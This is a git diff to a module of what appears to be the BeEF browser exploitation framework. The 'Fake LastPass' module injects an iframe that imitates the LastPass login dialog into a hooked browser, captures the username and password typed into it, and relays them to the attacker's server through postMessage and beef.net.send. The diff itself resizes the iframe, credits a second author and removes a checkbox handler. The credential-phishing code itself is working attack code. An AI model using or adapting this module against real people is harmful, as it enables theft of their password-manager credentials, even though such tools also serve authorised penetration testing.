diff --git a/modules/social_engineering/fake_lastpass/command.js b/modules/social_engineering/fake_lastpass/command.js old mode 100644 new mode 100755 index ef4b7190d..025610518 --- a/modules/social_engineering/fake_lastpass/command.js +++ b/modules/social_engineering/fake_lastpass/command.js @@ -26,7 +26,7 @@ beef.execute(function() { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Chrome IFrame Created .. awaiting messages'); } else { // Don't know how NON Chrome browsers look - so just going to pop the FF dialog - beef.dom.createIframe('custom','get',{'src':beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/lp/indexFF.html','id':'LPIFRAME'}, {'width':'280px','height':'345px','position':'fixed','left':(($j(window).width()/2)-140)+'px','top':'0px','z-index':beef.dom.getHighestZindex()+1,'border':'0px solid black','overflow':'hidden'}); + beef.dom.createIframe('custom','get',{'src':beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/lp/indexFF.html','id':'LPIFRAME'}, {'width':'260px','height':'300px','position':'fixed','left':(($j(window).width()/2)-130)+'px','top':'0px','z-index':beef.dom.getHighestZindex()+1,'border':'0px solid black','overflow':'hidden'}); beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Non-Chrome IFrame Created .. awaiting messages'); } diff --git a/modules/social_engineering/fake_lastpass/config.yaml b/modules/social_engineering/fake_lastpass/config.yaml old mode 100644 new mode 100755 index c39c851ef..f56a66cce --- a/modules/social_engineering/fake_lastpass/config.yaml +++ b/modules/social_engineering/fake_lastpass/config.yaml @@ -10,6 +10,6 @@ beef: category: "Social Engineering" name: "Fake LastPass" description: "Displays a fake LastPass user dialog." - authors: ["xntrik"] + authors: ["xntrik", "gcattani"] target: user_notify: ['ALL'] diff --git a/modules/social_engineering/fake_lastpass/create_small.png b/modules/social_engineering/fake_lastpass/create_small.png old mode 100644 new mode 100755 diff --git a/modules/social_engineering/fake_lastpass/icon.png b/modules/social_engineering/fake_lastpass/icon.png old mode 100644 new mode 100755 diff --git a/modules/social_engineering/fake_lastpass/index.html b/modules/social_engineering/fake_lastpass/index.html old mode 100644 new mode 100755 diff --git a/modules/social_engineering/fake_lastpass/indexFF.html b/modules/social_engineering/fake_lastpass/indexFF.html old mode 100644 new mode 100755 index f10985485..b32606ca3 --- a/modules/social_engineering/fake_lastpass/indexFF.html +++ b/modules/social_engineering/fake_lastpass/indexFF.html @@ -31,10 +31,6 @@ $(document).ready(function() { parent.postMessage('Show Vault changed to: ' + $('#showvault').prop('checked'),'*'); }); - $('#disableffpwd').change(function() { - parent.postMessage('Disable FF Password Management changed to: ' + $('disableffpwd').prop('checked'),'*'); - }); - $('#login,#cancel,#forgot,#screenkeyboard,#createaccount').click(function() { parent.postMessage('Button Clicked - username field: ' + $('#u').val() + '; password field: ' + $('#p').val(),'*'); parent.postMessage('KILLFRAME','*'); @@ -45,21 +41,20 @@ $(document).ready(function() {
-